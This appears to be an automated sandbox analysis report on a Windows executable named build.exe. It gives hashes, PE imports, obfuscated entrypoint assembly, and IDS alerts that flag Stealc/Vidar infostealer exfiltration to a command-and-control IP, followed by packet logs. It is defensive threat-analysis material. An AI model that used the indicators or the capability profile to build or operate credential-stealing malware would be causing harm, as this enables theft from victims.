Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.xb(a,b,c);return Array.isArray(a)?a:_.Hc};._.jj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133209
Entropy (8bit):	5.435886128222366
Encrypted:	false
SSDEEP:	3072:fXk2hK+G05hzyxT+BVAkYocAgrfuZUY2i6e:f9hZJy1JkYocAgrf6UY8e
MD5:	66703422E044D19479AC8240DDC114B1
SHA1:	935F86BD5D463A67DC9BD754B9511EBE0A63CA3F
SHA-256:	E9A2FD79793CF8A0654D48F18F86E003638C985C6C1278F9E1919759E8D0E73C
SHA-512:	59A2FA02659CEAA69EB8F74DAB3741D2BD7BC7ACC4A01A38D7F459F80DEA473123D8E304EFA8DB2970878F64D52C90DF70951CE9786BC0141232744D56102FF5
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	downloaded
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:	3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvDtorsWuiBHYzP5-lS7pwgoAa95g"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.26725526630775
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	build.exe
File size:	369'152 bytes
MD5:	8b54ae3edf9e8b611c27e4fdc3b2f4be
SHA1:	8f6e51fc8ae2a0b2a073391be39544d99b2ff2d2
SHA256:	b298238d73ab060de2c68fe53c8dc7479690e948d80aa8bf7a8b0e80fc6a5554
SHA512:	224b1f0caf10604dc86d58a91df57ef80457565a08862b965b47985df4741dfdf732a710a269f8d606e1a9eac02094c93d21084bfebb1d200cbf75e06ce49ec8
SSDEEP:	6144:M1QQpcQezFhBj9Xrase0l9RstdAidtdB8njOuOHY/Yp6kfDEVTu7c78RQdISBJu3:M1QY4d9RstfB8njCY/d2EJ78Afs9e8HV
TLSH:	86746B227E51C8B5C19529BF18CDAB6C1F6F8D877FC096D3A1986CAE5C617CB84B1302
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S.pg..........................................@..................................................................U..W....U..T..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42d98b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6770A553 [Sun Dec 29 01:26:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	9fa03dc67d87598889edf28a24bc9b26

Entrypoint Preview

Instruction
push ebx
push edi
push esi
sub esp, 00000408h
mov eax, 00000100h
lea ecx, dword ptr [esp+04h]
mov dword ptr [ecx], eax
mov dword ptr [esp], eax
mov edi, 5EE89D4Dh
mov eax, dword ptr [0044FEB0h]
add eax, edi
lea edx, dword ptr [esp+08h]
push ecx
push edx
call eax
xor ecx, ecx
test eax, eax
sete cl
mov eax, dword ptr [00450D64h]
mov ebx, 0189D4DAh
mov eax, dword ptr [eax+ecx*4+3A181B56h]
add eax, ebx
xor esi, esi
inc esi
jmp eax
add edi, dword ptr [0044FEB4h]
mov eax, esp
lea ecx, dword ptr [esp+00000208h]
push eax
push ecx
call edi
xor ecx, ecx
test eax, eax
setne cl
shl ecx, 05h
mov eax, dword ptr [00450D64h]
add ebx, dword ptr [eax+ecx+3A181B3Eh]
jmp ebx
lea edx, dword ptr [eax+40h]
lea ecx, dword ptr [eax+0Ch]
cmp dword ptr [esp+04h], 08h
cmove edx, ecx
mov ecx, 0189D4DAh
mov edx, dword ptr [edx+3A181B2Ah]
add edx, ecx
jmp edx
lea edx, dword ptr [eax+3Ch]
cmp dword ptr [esp], 07h
cmove edx, eax
add ecx, dword ptr [edx+3A181B2Ah]
jmp ecx
lea edx, dword ptr [eax+20h]
lea ecx, dword ptr [eax+08h]
cmp word ptr [esp+08h], 004Ah
cmove edx, ecx
mov ecx, 0189D4DAh
mov edx, dword ptr [edx+3A181B2Ah]
add edx, ecx
jmp edx
xor edx, edx
cmp word ptr [esp+00h], 0000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x455a8	0x57	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x455ff	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x56000	0x1a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x57000	0x8ffc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x45208	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x45a7c	0x328	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x398ec	0x39a00	73c97fe5ea8031503d0108ec31c26eaf	False	0.4176001559110629	data	6.80330329226556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x3b000	0xbb5c	0xbc00	aa3bb5408335e63fd5f369f0fdbc222d	False	0.9054396609042553	data	7.753388672041796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x47000	0xd388	0xb400	7132ebae4762340111a7067d72d65432	False	0.6408854166666667	data	7.26584418561517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg	0x55000	0x4	0x200	b76948572bbbec61b2bc1f3b63652fb9	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x56000	0x1a8	0x200	774df459a9b2deb9f2aeaee4ba6410ab	False	0.482421875	data	4.179663701400347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x57000	0x8ffc	0x9000	d5f45390d991c66cb363496ccdc0ca1a	False	0.4982367621527778	data	6.635239983168195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x56060	0x143	XML 1.0 document, ASCII text	English	United States	0.628482972136223

Imports

DLL	Import
KERNEL32.dll	CloseHandle, CopyFileA, CreateDirectoryA, CreateEventA, CreateFileA, CreateFileMappingA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetComputerNameW, GetCurrentProcess, GetCurrentProcessId, GetDriveTypeA, GetEnvironmentVariableA, GetFileAttributesA, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetLastError, GetLocalTime, GetLocaleInfoA, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetSystemInfo, GetSystemPowerStatus, GetSystemTime, GetTickCount, GetTimeZoneInformation, GetUserDefaultLocaleName, GetVolumeInformationA, GetWindowsDirectoryA, GlobalAlloc, GlobalFree, GlobalLock, GlobalMemoryStatusEx, GlobalSize, HeapAlloc, HeapFree, InitializeCriticalSectionEx, IsWow64Process, K32EnumProcessModules, K32GetModuleBaseNameA, K32GetModuleFileNameExA, LoadLibraryW, LocalAlloc, LocalFree, MapViewOfFile, OpenEventA, OpenProcess, Process32First, Process32Next, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, TerminateProcess, UnmapViewOfFile, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcpyA, lstrcpynA, lstrlenA
msvcrt.dll	??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _itoa_s, _splitpath, _wtoi64, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetCurrentHwProfileA, GetUserNameA, GetUserNameW, RegCloseKey, RegEnumKeyExA, RegGetValueA, RegOpenKeyExA, RegQueryValueExA
api-ms-win-crt-runtime-l1-1-0.dll	_invalid_parameter_noinfo_noreturn
USER32.dll	CharToOemA, CharToOemW, CloseDesktop, CloseWindow, CreateDesktopA, EnumDisplayDevicesA, GetDC, GetDesktopWindow, GetKeyboardLayoutList, GetWindowRect, MessageBoxA, OpenDesktopA, ReleaseDC, wsprintfA, wsprintfW
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsnprintf_s, __stdio_common_vsprintf
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCA, DeleteObject, GetDeviceCaps, SelectObject
ole32.dll	CoCreateInstance, CreateStreamOnHGlobal, GetHGlobalFromStream
OLEAUT32.dll	SysAllocString, SysFreeString
SHELL32.dll	SHFileOperationA, SHGetFolderPathA, ShellExecuteExA
WS2_32.dll	WSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
SHLWAPI.dll	PathFileExistsA, PathMatchSpecA, StrStrA
CRYPT32.dll	CryptBinaryToStringA, CryptUnprotectData
WININET.dll	HttpOpenRequestA, HttpQueryInfoA, HttpSendRequestA, InternetCloseHandle, InternetConnectA, InternetCrackUrlA, InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetSetOptionA
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptSetProperty
dbghelp.dll	SymCleanup, SymFromAddr, SymGetLineFromAddr64, SymInitialize, SymMatchString, SymSetOptions

Exports

Name	Ordinal	Address
_UnhandledExceptionFilter@4	1	0x424b28

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T23:00:02.436261+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.4	49732	116.203.166.124	443	TCP
2025-01-11T23:00:03.777259+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.4	49733	116.203.166.124	443	TCP
2025-01-11T23:00:05.251359+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.166.124	443	192.168.2.4	49734	TCP
2025-01-11T23:00:06.592798+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.166.124	443	192.168.2.4	49735	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 22:59:58.719516039 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:58.719563961 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:58.719738960 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:58.734915972 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:58.734936953 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.355406046 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.355492115 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.427299976 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.427335024 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.428388119 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.428468943 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.432914972 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.475336075 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690274000 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690335989 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690345049 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.690385103 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690406084 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.690450907 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690457106 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.690474033 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690504074 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.690540075 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.690553904 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690608978 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.690629959 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.690700054 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.696676970 CET	49730	443	192.168.2.4	149.154.167.99
Jan 11, 2025 22:59:59.696691990 CET	443	49730	149.154.167.99	192.168.2.4
Jan 11, 2025 22:59:59.722383976 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 22:59:59.722475052 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 22:59:59.722557068 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 22:59:59.722819090 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 22:59:59.722852945 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:00.599950075 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:00.600105047 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:00.622064114 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:00.622109890 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:00.623028040 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:00.623112917 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:00.623647928 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:00.667346954 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.090879917 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.090956926 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.090989113 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.091036081 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.091097116 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.091145992 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.093990088 CET	49731	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.094007969 CET	443	49731	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.103517056 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.103606939 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.103688002 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.103940010 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.103975058 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.758073092 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.758192062 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.758656979 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.758685112 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:01.760241985 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:01.760256052 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.436352015 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.436446905 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.436527967 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.436564922 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.436584949 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.436621904 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.436640978 CET	443	49732	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.436664104 CET	49732	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.442894936 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.443002939 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.443135977 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.443355083 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:02.443387985 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:02.588139057 CET	49675	443	192.168.2.4	173.222.162.32
Jan 11, 2025 23:00:03.110219955 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.110404968 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.111108065 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.111130953 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.112880945 CET	49733	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:03.112899065 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.777364016 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.777431011 CET	443	49733	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:03.777570963 CET	443	49733	116.203.166.124	192.168.2.4
